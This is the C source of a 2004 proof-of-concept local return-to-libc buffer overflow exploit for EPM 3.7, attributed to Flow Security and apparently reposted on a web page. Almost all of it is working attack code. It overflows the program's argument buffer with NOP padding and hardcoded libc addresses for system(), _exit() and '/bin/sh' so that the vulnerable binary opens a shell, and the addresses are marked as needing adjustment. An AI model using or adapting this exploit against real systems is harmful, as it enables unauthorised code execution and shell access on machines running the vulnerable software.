EPM Buffer Overflow (retlibc exploit)/*
* _____ _
* | ___| | _____ ___
* | |_ | |/ _ \ \ /\ / /
* | _| | | (_) \ V V /
* |_| |_|\___/ \_/\_/
* Security Group.
*
* Description: flow-epm.c (www.flowsecurity.org);
*
* Proof of Concept local RetLibc exploit for EPM - 3.7(not suid
by default).
*
* It has been successfull tested on:
*
* Suse Linux 9.0
* Greets:
*
* Luiz Fernando Camargo
* Jefferson Cechinel
* Gerrit
* fAil
* newbug
*
* Date: 29'Sep 2004
*
*
* Author:
* Thyago Silva - setnf@flowsecurity.org
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <dlfcn.h>
#define PNAME "./epm" // program name
#define NOP 0x90 // No Operation
/* You need change the addr's */
#define SYSTEM 0x4006d4b0 // system() address in libc
#define EXIT 0x400d8088 // _exit() address in libc
#define SHELL 0x40151439 // /bin/sh address in libc
int main(int argc, char *argv[])
{
if(argc < 3 || argc > 3) {
fprintf(stderr, "############## Flow Security ##############\n");
fprintf(stderr, "# RetLibc Exploit for EPM - 3.7 #\n");
fprintf(stderr, "# setnf@flowsecurity.org #\n");
fprintf(stderr, "###########################################\n\n");
fprintf(stderr, "[!] Usage: %s <path> <offset>\n\n", argv[0]);
exit(0); }
int TBUFF = ((256 + 4) + (4 * 3) + 1); /* total buffer */
int NBUFF = ((256 / 4) + atoi(argv[2])); /* NOP buffer with offset */
fprintf(stderr, "[*] Program name : [%s]\n", argv[1]);
fprintf(stderr, "[*] Offset : [%d]\n", atoi(argv[2]));
char buf[TBUFF];
int *p = (int *)buf;
fprintf(stderr, "[*] system() address : [%p]\n", SYSTEM);
fprintf(stderr, "[*] _exit() address : [%p]\n", EXIT);
fprintf(stderr, "[*] /bin/sh address : [%p]\n", SHELL);
/* fill the first part of the buffer */
memset(buf, NOP, TBUFF);
p += NBUFF;
/* prepare the stack */
*p++ = SYSTEM;
*p++ = EXIT;
*p++ = SHELL;
*p = 0x0;
/* run the vulnerable program */
execl(argv[1], argv[1] + 2, buf, NULL);
perror("\n[!]");
}
推荐
评论(0条)
